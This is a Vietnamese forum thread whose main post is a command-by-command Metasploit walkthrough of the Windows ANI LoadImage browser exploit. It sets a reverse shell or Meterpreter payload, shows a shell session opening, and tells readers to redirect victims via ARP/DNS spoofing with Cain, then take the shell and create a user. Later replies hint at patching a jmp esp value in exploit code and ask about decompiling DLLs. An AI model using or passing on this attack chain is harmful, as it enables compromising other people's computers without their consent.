khai thác trong metasploit 3.0 đã update mới nhất
dùng command nhé
>> show exploits
>> use windows/browser/ani_loadimage_chunksize
>> show payloads
>> set PAYLOAD (windows/shell_reverse_tcp hoặc windows/meterpreter/reverse_tcp)
>> show options
>> set SRVPORT ____(port) vd:80
>> set URIPATH ____(web) vd: /BHAT
>> set LHOST ______ (ip)vd: 10.0.10.2
>> exploit
( vi dụ khai thác )
[*] Started reverse handler
[*] Using URL: http://10.0.10.2:80/BHAT [*] Server started.
[*] Exploit running as background job.
[*] Command shell session 1 opened (10.0.10.2:4444 -> 10.0.0.11:1280)
>> sessions -i 1
mình đã dính đoạn code khai thác vào http://10.0.10.2:80/BHAT
việc còn lại là cho người sẽ bị khai thác vào đúng cái web mình dã dựng lên.
Đơn giản là các bạn dùng Cain để ARP spoofing cái DNS, vd: khi nó vào trang web nào đó thì sẽ đẩy sang trang web của mình. để yên cho metasploit khai thác.
sau khi khai thác thì việc chiếm shell ok.
tạo user rồi enjoy.
có gì thắc mắc trong việc test. pm thoải mái. OK
have fun
Dùng tools thì đơn giản quá, phải tự mình làm mới khoái chứ
Gợi ý cho cái code C ở trên nhá --> Cái jmp esp phải thay thế cho đúng --> thía thôi :lol
em có 2 file.dll cần giải mã (dịch) để sửa lại nhưng ko biết dùng chương trình gì để giải nó ra
anh nào biết có thể cho em link downloa chương trình và hướng dẫn em cách dùng được ko
( ai giúp em xin ghi lòng tạc dạ ) cho em cả địa chỉ yahoo để em cảm ơn nha
--> *.dll mà dịch được thì ... )
Nhưng xem mã asm thì okie --> dùng Diassembly --> nhưng mà bạn sửa được trên mã asm thì
Bạn nên tự tìm hiểu, những vấn đề nhậy cảm như vậy nơi hỏi tốt nhất là google.com . Chứ ai đó nêu cách viết một con Virus lên đây thì rất dễ dàng nhưng theo mình thì cũng rất nhậy cảm vì bạn có ý tốt nhưng người khác thì không thế đâu